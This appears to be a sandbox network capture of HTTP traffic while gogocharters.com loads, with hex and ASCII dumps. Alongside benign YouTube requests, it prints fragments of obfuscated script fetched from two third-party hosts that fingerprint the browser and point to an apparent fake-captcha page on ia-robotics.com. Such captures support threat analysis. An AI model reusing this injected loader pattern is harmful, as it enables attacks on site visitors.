2025-05-21 19:48:01 UTC	600	OUT	GET /iframe_api HTTP/1.1 host: www.youtube.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / x-client-data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEIxeHOAQ== sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9
2025-05-21 19:48:01 UTC	1460	IN	HTTP/1.1 200 OK content-type: text/javascript; charset=utf-8 x-content-type-options: nosniff expires: Wed, 21 May 2025 19:48:01 GMT date: Wed, 21 May 2025 19:48:01 GMT cache-control: private, max-age=0 strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN permissions-policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* cross-origin-opener-policy-report-only: same-origin; report-to="youtube_main" accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} content-security-policy: require-trusted-types-for 'script' origin-trial: ApTXX1w2dkJZuuxlV9csQYg+9ZVXekg+mOu8mS9vb7/V2oeMLKqGC8blgR6ech+eqbhGAgLKPthyai7z89MdTAgAAACLeyJvcmlnaW4iOiJodHRwczovL3d3dy55b3V0dWJlLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQb2xpY3lJbmNsdWRlSlNDYWxsU3RhY2tzSW5DcmFzaFJlcG9ydHMiLCJleHBpcnkiOjE3NDk1MTM2MDAsImlzU3ViZG9tYWluIjp0cnVlfQ== origin-trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdG
2025-05-21 19:48:01 UTC	1196	IN	Data Raw: 6c 76 62 69 49 73 49 6d 56 34 63 47 6c 79 65 53 49 36 4d 54 63 31 4f 44 41 32 4e 7a 45 35 4f 53 77 69 61 58 4e 54 64 57 4a 6b 62 32 31 68 61 57 34 69 4f 6e 52 79 64 57 56 39 0d 0a 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 72 65 73 6f 75 72 63 65 2d 70 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a 70 33 70 3a 20 43 50 3d 22 54 68 69 73 20 69 73 20 6e 6f 74 20 61 20 50 33 50 20 70 6f 6c 69 63 79 21 20 53 65 65 20 68 74 74 70 3a 2f 2f 73 75 70 70 6f 72 74 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 73 2f 61 6e 73 77 65 72 2f 31 35 31 36 35 37 3f 68 6c 3d 65 6e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 2e 22 0d 0a 73 65 72 76 65 72 3a 20 45 53 46 0d 0a 78 2d 78 73 73 2d 70 72 6f 74 65 63 74 69 6f 6e 3a 20 30 0d 0a 73 65 74 2d 63 6f Data Ascii: lvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9cross-origin-resource-policy: cross-originp3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."server: ESFx-xss-protection: 0set-co
2025-05-21 19:48:01 UTC	1116	IN	Data Raw: 76 61 72 20 73 63 72 69 70 74 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 5c 2f 73 5c 2f 70 6c 61 79 65 72 5c 2f 38 30 34 63 36 37 64 32 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 76 66 6c 73 65 74 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 6a 73 27 3b 77 69 6e 64 6f 77 5b 27 79 74 5f 65 6d 62 65 64 73 45 6e 61 62 6c 65 49 66 72 61 6d 65 41 70 69 53 65 6e 64 46 75 6c 6c 45 6d 62 65 64 55 72 6c 27 5d 20 3d 20 20 74 72 75 65 20 3b 77 69 6e 64 6f 77 5b 27 79 74 5f 65 6d 62 65 64 73 45 6e 61 62 6c 65 41 75 74 6f 70 6c 61 79 41 6e 64 56 69 73 69 62 69 6c 69 74 79 53 69 67 6e 61 6c 73 27 5d 20 3d 20 20 74 72 75 65 20 3b 74 72 79 7b 76 61 72 20 74 74 50 6f 6c 69 63 79 3d 77 69 6e 64 6f 77 2e 74 72 75 Data Ascii: var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/804c67d2\/www-widgetapi.vflset\/www-widgetapi.js';window['yt_embedsEnableIframeApiSendFullEmbedUrl'] = true ;window['yt_embedsEnableAutoplayAndVisibilitySignals'] = true ;try{var ttPolicy=window.tru
2025-05-21 19:48:03 UTC	842	OUT	GET /s/player/804c67d2/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1 host: www.youtube.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / x-client-data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiJo8sBCIWgzQEIxeHOAQ== sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 cookie: YSC=OHSAs2OGD6k cookie: VISITOR_INFO1_LIVE=L-W7LhVuhTg cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgHA%3D%3D cookie: __Secure-ROLLOUT_TOKEN=COiunN7jhMP6JRDirbykqrWNAxjirbykqrWNAw%3D%3D
2025-05-21 19:48:03 UTC	668	IN	HTTP/1.1 200 OK accept-ranges: bytes cross-origin-resource-policy: cross-origin cross-origin-opener-policy-report-only: same-origin; report-to="youtube" report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]} content-length: 30705 x-content-type-options: nosniff server: sffe x-xss-protection: 0 date: Wed, 21 May 2025 14:11:06 GMT expires: Thu, 21 May 2026 14:11:06 GMT cache-control: public, max-age=31536000 last-modified: Mon, 19 May 2025 04:10:30 GMT content-type: text/javascript vary: Accept-Encoding, Origin age: 20216 alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 6e 3b 66 75 6e 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 0a 76 61 72 20 70 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 Data Ascii: (function(){'use strict';var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var p=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 61 28 61 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 0a 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 0a 72 65 74 75 72 6e 20 61 7d 0a 76 61 72 20 66 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 7d 0a 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 Data Ascii: igurable:!0,writable:!0,value:function(){return ea(aa(this))}})}return a});function ea(a){a={next:a};a[Symbol.iterator]=function(){return this};return a}var fa=typeof Object.create=="function"?Object.create:function(a){function b(){}b.prototype=a;retu
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 6a 3d 21 31 2c 66 3b 76 61 72 20 65 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 61 2e 67 2e 68 3d 6e 75 6c 6c 2c 42 28 61 2e 67 2c 68 29 2c 45 28 61 29 7d 61 2e 67 2e 68 3d 6e 75 6c 6c 3b 64 2e 63 61 6c 6c 28 61 2e 67 2c 65 29 3b 72 65 74 75 72 6e 20 45 28 61 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 45 28 61 29 7b 66 6f 72 28 3b 61 2e 67 2e 67 3b 29 74 72 79 7b 76 61 72 20 62 3d 61 2e 68 28 61 2e 67 29 3b 69 66 28 62 29 72 65 74 75 72 6e 20 61 2e 67 2e 6a 3d 21 31 2c 7b 76 61 6c 75 65 3a 62 2e 76 61 6c 75 65 2c 64 6f 6e 65 3a 21 31 7d 7d 63 61 74 63 68 28 63 29 7b 61 2e 67 2e 6d 3d 76 6f 69 64 20 30 2c 42 28 61 2e 67 2c 63 29 7d 61 2e 67 2e 6a 3d 21 31 3b 69 66 28 61 2e 67 2e 69 29 7b 62 3d 61 2e 67 2e 69 3b 61 2e 67 2e 69 3d 6e Data Ascii: j=!1,f;var e=f.value}catch(h){return a.g.h=null,B(a.g,h),E(a)}a.g.h=null;d.call(a.g,e);return E(a)}function E(a){for(;a.g.g;)try{var b=a.h(a.g);if(b)return a.g.j=!1,{value:b.value,done:!1}}catch(c){a.g.m=void 0,B(a.g,c)}a.g.j=!1;if(a.g.i){b=a.g.i;a.g.i=n
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 74 6f 74 79 70 65 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 69 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 7d 29 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6c 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6b 7c 7c 28 6b 3d 21 30 2c 6c 2e 63 61 6c 6c 28 67 2c 6d 29 29 7d 7d 0a 76 61 72 20 67 3d 74 68 69 73 2c 6b 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 4a 29 2c 72 65 6a 65 63 74 3a 68 28 74 68 69 73 2e 6c 29 7d 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 69 66 28 68 3d 3d 3d 74 68 69 73 29 74 68 69 73 2e 6c 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 Data Ascii: totype.j=function(h){this.i(function(){throw h;})};b.prototype.j=function(){function h(l){return function(m){k\|\|(k=!0,l.call(g,m))}}var g=this,k=!1;return{resolve:h(this.J),reject:h(this.l)}};b.prototype.J=function(h){if(h===this)this.l(new TypeError("
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 77 20 63 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4c 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 67 3d 74 68 69 73 2e 6a 28 29 3b 68 2e 42 28 67 2e 72 65 73 6f 6c 76 65 2c 67 2e 72 65 6a 65 63 74 29 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 28 29 3b 74 72 79 7b 68 2e 63 61 6c 6c 28 67 2c 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 74 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 77 2c 41 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 77 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 66 75 6e 63 74 69 6f 6e 28 Data Ascii: w c;b.prototype.L=function(h){var g=this.j();h.B(g.resolve,g.reject)};b.prototype.M=function(h,g){var k=this.j();try{h.call(g,k.resolve,k.reject)}catch(l){k.reject(l)}};b.prototype.then=function(h,g){function k(w,A){return typeof w=="function"?function(
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6b 29 7b 6b 3d 78 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 0a 66 75 6e 63 74 69 6f 6e 20 64 28 6b 29 7b 76 61 72 20 6c 3d 74 79 70 65 6f 66 20 6b 3b 72 65 74 75 72 6e 20 6c 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 6b 21 3d 3d 6e 75 6c 6c 7c 7c 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 7d 0a 66 75 6e 63 74 69 6f 6e 20 66 28 6b 29 7b 69 66 28 21 46 28 6b 2c 68 29 29 7b 76 61 72 20 6c 3d 6e 65 77 20 63 3b 70 28 6b 2c 68 2c 7b 76 61 6c 75 65 3a 6c 7d 29 7d 7d 0a 66 75 6e Data Ascii: =Math.random()+1).toString();if(k){k=x(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}}function c(){}function d(k){var l=typeof k;return l==="object"&&k!==null\|\|l==="function"}function f(k){if(!F(k,h)){var l=new c;p(k,h,{value:l})}}fun
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6d 3d 67 5b 30 5d 5b 6c 5d 3b 69 66 28 6d 26 26 46 28 67 5b 30 5d 2c 6c 29 29 66 6f 72 28 67 3d 30 3b 67 3c 6d 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 7b 76 61 72 20 75 3d 6d 5b 67 5d 3b 69 66 28 6b 21 3d 3d 6b 26 26 75 2e 6b 65 79 21 3d 3d 75 2e 6b 65 79 7c 7c 6b 3d 3d 3d 75 2e 6b 65 79 29 72 65 74 75 72 6e 7b 69 64 3a 6c 2c 6c 69 73 74 3a 6d 2c 69 6e 64 65 78 3a 67 2c 6f 3a 75 7d 7d 72 65 74 75 72 6e 7b 69 64 3a 6c 2c 6c 69 73 74 3a 6d 2c 69 6e 64 65 78 3a 2d 31 2c 6f 3a 76 6f 69 64 20 30 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 66 28 67 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 3b 69 66 28 67 29 7b 67 3d 78 28 67 29 3b 66 6f 72 28 76 61 72 20 6b 3b 21 28 6b Data Ascii: l="p_"+k;var m=g[0][l];if(m&&F(g[0],l))for(g=0;g<m.length;g++){var u=m[g];if(k!==k&&u.key!==u.key\|\|k===u.key)return{id:l,list:m,index:g,o:u}}return{id:l,list:m,index:-1,o:void 0}}function f(g){this[0]={};this[1]=b();this.size=0;if(g){g=x(g);for(var k;!(k
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 5b 67 2e 6b 65 79 2c 67 2e 76 61 6c 75 65 5d 7d 29 7d 3b 0a 66 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 67 2e 6b 65 79 7d 29 7d 3b 0a 66 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 67 2e 76 61 6c 75 65 7d 29 7d 3b 0a 66 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 74 68 69 73 2e Data Ascii: ction(){return c(this,function(g){return[g.key,g.value]})};f.prototype.keys=function(){return c(this,function(g){return g.key})};f.prototype.values=function(){return c(this,function(g){return g.value})};f.prototype.forEach=function(g,k){for(var l=this.

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:02 UTC	566	OUT	GET /ajax.php? HTTP/1.1 Host: myvocabulary.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://gogocharters.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-05-21 19:48:03 UTC	319	IN	HTTP/1.1 200 OK Date: Wed, 21 May 2025 19:48:02 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.5 Cache-Control: no-store Access-Control-Allow-Origin: * Vary: Accept-Encoding Content-Length: 2859 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/javascript
2025-05-21 19:48:03 UTC	1460	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 61 64 61 74 61 3d 7b 22 63 69 64 22 3a 22 66 63 31 66 66 64 37 30 64 64 64 30 33 66 37 63 37 32 65 35 31 66 32 33 33 66 62 30 39 32 62 34 22 2c 22 6a 73 22 3a 66 61 6c 73 65 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 61 2d 72 6f 62 6f 74 69 63 73 2e 63 6f 6d 5c 2f 63 61 70 74 63 68 61 5c 2f 22 2c 22 6f 6b 22 3a 74 72 75 65 2c 22 61 63 74 69 6f 6e 22 3a 22 72 65 66 72 65 73 68 22 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 76 2c 77 29 7b 76 61 72 20 66 3d 5b 5d 2c 63 3d 7b 6d 6f 64 65 3a 22 61 6a 61 78 22 7d 2c 78 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 62 29 7b Data Ascii: window._adata={"cid":"fc1ffd70ddd03f7c72e51f233fb092b4","js":false,"target":"https:\/\/ia-robotics.com\/captcha\/","ok":true,"action":"refresh"};(function(v,w){var f=[],c={mode:"ajax"},x=document.getElementById(btoa(window.location.origin));function p(b){
2025-05-21 19:48:03 UTC	1399	IN	Data Raw: 65 3d 62 28 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65 29 3b 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 76 61 72 20 67 3d 7b 7d 3b 61 3d 61 2e 61 74 74 72 69 62 75 74 65 73 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 61 29 65 3d 61 5b 65 5d 2c 67 5b 65 2e 6e 6f 64 65 4e 61 6d 65 5d 3d 65 2e 6e 6f 64 65 56 61 6c 75 65 3b 72 65 74 75 72 6e 20 67 7d 63 61 74 63 68 28 6b 29 7b 66 2e 70 75 73 68 28 6b 2e 6d 65 73 73 61 67 65 29 7d 7d 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 3b 63 2e 64 6f 63 75 6d 65 6e 74 3d 62 28 64 6f 63 75 6d 65 6e 74 29 3b 74 72 79 7b 63 2e 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 3d 0a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 7a 6f Data Ascii: e=b(window.console);c.documentElement=function(a){try{var g={};a=a.attributes;for(var e in a)e=a[e],g[e.nodeName]=e.nodeValue;return g}catch(k){f.push(k.message)}}(document.documentElement);c.document=b(document);try{c.timezoneOffset=(new Date).getTimezo

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:02 UTC	527	OUT	GET / HTTP/1.1 host: ipv6.6sc.co sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://gogocharters.com sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty referer: https://gogocharters.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-05-21 19:48:02 UTC	441	IN	HTTP/1.1 200 OK content-type: text/html content-length: 4 expires: Wed, 21 May 2025 19:48:02 GMT cache-control: max-age=0, no-cache, no-store pragma: no-cache date: Wed, 21 May 2025 19:48:02 GMT server-timing: cdn-cache; desc=HIT server-timing: edge; dur=1 6si-ipv6: null access-control-allow-origin: https://gogocharters.com vary: Origin server-timing: ak_p; desc="1747856881930_399898544_1067034445_12_396_161_163_15";dur=1
2025-05-21 19:48:02 UTC	4	IN	Data Raw: 6e 75 6c 6c Data Ascii: null

Timestamp	Bytes transferred	Direction	Data
2025-05-21 19:48:02 UTC	579	OUT	GET /captcha/ajax.php? HTTP/1.1 Host: clients.contology.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://gogocharters.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-05-21 19:48:02 UTC	335	IN	HTTP/1.1 200 OK Server: Apache/2.4 Cache-Control: no-store Content-Type: application/javascript Strict-Transport-Security: max-age=15552000 Date: Wed, 21 May 2025 19:48:02 GMT Access-Control-Allow-Origin: * Connection: Keep-Alive Set-Cookie: X-Mapping-lgemgpmo=0572838B93C65DCCDDFED6E4128A1C51; path=/ Content-Length: 2848
2025-05-21 19:48:02 UTC	1460	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 61 64 61 74 61 3d 7b 22 63 69 64 22 3a 22 35 65 61 61 35 30 39 36 66 37 34 34 36 63 64 65 31 39 65 34 34 31 31 37 36 61 36 39 66 35 65 65 22 2c 22 6a 73 22 3a 66 61 6c 73 65 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 61 2d 72 6f 62 6f 74 69 63 73 2e 63 6f 6d 5c 2f 63 61 70 74 63 68 61 5c 2f 22 2c 22 6f 6b 22 3a 74 72 75 65 2c 22 61 63 74 69 6f 6e 22 3a 22 72 65 66 72 65 73 68 22 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 76 2c 77 29 7b 76 61 72 20 66 3d 5b 5d 2c 63 3d 7b 7d 2c 78 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 29 3b 66 75 6e 63 74 69 6f 6e 20 70 28 62 29 7b 69 66 28 62 2e 6f 6b 29 73 77 69 Data Ascii: window._adata={"cid":"5eaa5096f7446cde19e441176a69f5ee","js":false,"target":"https:\/\/ia-robotics.com\/captcha\/","ok":true,"action":"refresh"};(function(v,w){var f=[],c={},x=document.getElementById(btoa(window.location.origin));function p(b){if(b.ok)swi
2025-05-21 19:48:02 UTC	1388	IN	Data Raw: 63 6f 6e 73 6f 6c 65 29 3b 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 76 61 72 20 67 3d 7b 7d 3b 61 3d 61 2e 61 74 74 72 69 62 75 74 65 73 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 61 29 65 3d 61 5b 65 5d 2c 67 5b 65 2e 6e 6f 64 65 4e 61 6d 65 5d 3d 65 2e 6e 6f 64 65 56 61 6c 75 65 3b 72 65 74 75 72 6e 20 67 7d 63 61 74 63 68 28 6b 29 7b 66 2e 70 75 73 68 28 6b 2e 6d 65 73 73 61 67 65 29 7d 7d 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 3b 63 2e 64 6f 63 75 6d 65 6e 74 3d 62 28 64 6f 63 75 6d 65 6e 74 29 3b 74 72 79 7b 63 2e 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 3d 0a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 7d Data Ascii: console);c.documentElement=function(a){try{var g={};a=a.attributes;for(var e in a)e=a[e],g[e.nodeName]=e.nodeValue;return g}catch(k){f.push(k.message)}}(document.documentElement);c.document=b(document);try{c.timezoneOffset=(new Date).getTimezoneOffset()}

Timestamp	Bytes transferred	Direction	Data
